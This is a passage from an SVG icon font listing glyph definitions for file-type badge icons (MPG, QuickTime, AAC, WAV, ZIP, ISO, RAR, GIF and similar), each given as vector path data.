<glyph unicode="&#xecaf;" glyph-name="file-mpg2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM336 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM448 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM768 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xecb0;" glyph-name="file-quicktime" d="M469.621 323.752l28.321-28.321 22.627 22.627-24.102 24.102c9.681 11.209 15.533 25.86 15.533 42.029v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c7.645 0 14.978 1.321 21.777 3.752zM441.373 352h-25.406c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-31.994v-96.012c0-7.183-2.332-13.779-6.274-19.093l-43.668 43.668-22.627-22.627 33.941-33.941zM256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM608 512v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xecb1;" glyph-name="file-quicktime2" d="M469.621 323.752c-6.799-2.431-14.132-3.752-21.777-3.752h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-16.169-5.853-30.82-15.533-42.029l24.102-24.102-22.627-22.627-28.321 28.321zM441.373 352h-25.406c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-31.994v-96.012c0-7.183-2.332-13.779-6.274-19.093l-43.668 43.668-22.627-22.627 33.941-33.941zM256.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562zM608 512h-64v32h160v-32h-64v-192h-32v192z" />
<glyph unicode="&#xecb2;" glyph-name="file-mid" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM368 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM512 512v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM608 544h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM640 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033z" />
<glyph unicode="&#xecb3;" glyph-name="file-mid2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM368 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM512 512v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM608 544v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM640 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033z" />
<glyph unicode="&#xecb4;" glyph-name="file-3gp" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM256 480c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64 0-19.214-8.37-36.334-21.648-48.021 13.292-11.727 21.648-28.875 21.648-47.979 0-35.593-28.724-64-64.156-64h-31.688c-35.551 0-64.156 28.654-64.156 64h32c0-17.673 14.165-32 31.967-32h32.067c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-32.033v32h32.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.204-31.967-32h-32zM576 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM640 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM672 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecb5;" glyph-name="file-3gp2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM256 480h32c0 17.796 14.312 32 31.967 32h32.067c17.801 0 31.967-14.327 31.967-32 0-17.796-14.312-32-31.967-32h-32.033v-32h32.033c17.801 0 31.967-14.327 31.967-32 0-17.796-14.312-32-31.967-32h-32.067c-17.801 0-31.967 14.327-31.967 32h-32c0-35.346 28.605-64 64.156-64h31.688c35.432 0 64.156 28.407 64.156 64 0 19.104-8.356 36.252-21.648 47.979 13.278 11.688 21.648 28.807 21.648 48.021 0 35.346-28.605 64-64.156 64h-31.688c-35.432 0-64.156-28.407-64.156-64zM576 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM640 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM672 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecb6;" glyph-name="file-aiff" d="M191.764 640h672.471c52.918 0 95.764-42.963 95.764-95.961v-224.078c0-53.009-42.875-95.961-95.764-95.961h-672.471c-52.918 0-95.764 42.963-95.764 95.961v224.078c0 53.009 42.875 95.961 95.764 95.961zM192.115 608c-35.41 0-64.115-28.806-64.115-63.745v-224.511c0-35.205 28.472-63.745 64.115-63.745h671.77c35.41 0 64.115 28.806 64.115 63.745v224.511c0 35.205-28.472 63.745-64.115 63.745h-671.77zM320 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM255.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM416 512v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM544 448v64h128v32h-160v-224h32v96h96v32h-96zM736 448v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xecb7;" glyph-name="file-aiff2" d="M191.764 640h672.471c52.918 0 95.764-42.963 95.764-95.961v-224.078c0-53.009-42.875-95.961-95.764-95.961h-672.471c-52.918 0-95.764 42.963-95.764 95.961v224.078c0 53.009 42.875 95.961 95.764 95.961zM320 416v-96h32v160c0 35.346-28.605 64-64.156 64h-31.688c-35.432 0-64.156-28.407-64.156-64v-160h32v96h96zM255.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM416 512v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM544 448v64h128v32h-160v-224h32v96h96v32h-96zM736 448v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xecb8;" glyph-name="file-aac" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM384 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM319.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM576 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM511.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM800 384c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006z" />
<glyph unicode="&#xecb9;" glyph-name="file-aac2" d="M256.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562zM384 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM319.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM576 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM511.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM800 384c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006z" />
<glyph unicode="&#xecba;" glyph-name="file-wav" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM400 320h-16l-48 96-48-96h-32v224h32v-160l32 64h32l32-64v160h32v-224h-16zM576 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM511.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM720 376l48 168h32l-64-224h-32l-64 224h32l48-168z" />
<glyph unicode="&#xecbb;" glyph-name="file-wav2" d="M256.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562zM400 320h-16l-48 96-48-96h-32v224h32v-160l32 64h32l32-64v160h32v-224h-16zM576 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM511.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM720 376l48 168h32l-64-224h-32l-64 224h32l48-168z" />
<glyph unicode="&#xecbc;" glyph-name="file-zip2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM320 352l128 160v32h-160v-32h128l-128-160v-32h160v32h-128zM512 512v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM608 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM640 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecbd;" glyph-name="file-zip3" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM320 352l128 160v32h-160v-32h128l-128-160v-32h160v32h-128zM512 512v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM608 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM640 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecbe;" glyph-name="file-ott" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM320.156 544h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM319.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM512 512v-192h32v192h64v32h-160v-32h64zM704 512v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xecbf;" glyph-name="file-ott2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM320.156 544c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM319.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM512 512v-192h32v192h64v32h-160v-32h64zM704 512v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xecc0;" glyph-name="file-tgz" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM320 512v-192h32v192h64v32h-160v-32h64zM576 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM672 352l128 160v32h-160v-32h128l-128-160v-32h160v32h-128z" />
<glyph unicode="&#xecc1;" glyph-name="file-tgz2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM320 512v-192h32v192h64v32h-160v-32h64zM576 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM672 352l128 160v32h-160v-32h128l-128-160v-32h160v32h-128z" />
<glyph unicode="&#xecc2;" glyph-name="file-dmg" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM256 544h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM288 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM528 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM768 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xecc3;" glyph-name="file-dmg2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM256 544v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM288 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM528 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM768 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xecc4;" glyph-name="file-iso" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM320 512v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM480.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM672.156 544h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM671.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067z" />
<glyph unicode="&#xecc5;" glyph-name="file-iso2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM320 512v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM480.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM672.156 544c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM671.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067z" />
<glyph unicode="&#xecc6;" glyph-name="file-rar" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM313.6 416h-25.6v-96h-32v224h95.844c35.551 0 64.156-28.654 64.156-64 0-35.54-28.639-63.916-64-64l64-96h-38.4l-64 96zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM576 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM511.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM697.6 416h-25.6v-96h-32v224h95.844c35.551 0 64.156-28.654 64.156-64 0-35.54-28.639-63.916-64-64l64-96h-38.4l-64 96zM672 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecc7;" glyph-name="file-rar2" d="M256.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562zM313.6 416h-25.6v-96h-32v224h95.844c35.551 0 64.156-28.654 64.156-64 0-35.54-28.639-63.916-64-64l64-96h-38.4l-64 96zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM576 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM511.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM697.6 416h-25.6v-96h-32v224h95.844c35.551 0 64.156-28.654 64.156-64 0-35.54-28.639-63.916-64-64l64-96h-38.4l-64 96zM672 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecc8;" glyph-name="file-gif" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM416 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM512 512v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM640 448v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xecc9;" glyph-name="file-gif2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM416 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM512 512v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM640 448v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xecca;" glyph-name="document-file-numbers" d="M416 384v-160h-32v224h32l96-160v160h32v-224h-32l-96 160zM704 448h32v-159.811c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v159.811h32v-159.906c0-17.725 14.165-32.094 31.967-32.094h32.067c17.655 0 31.967 14.012 31.967 32.094v159.906zM848 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745z" />
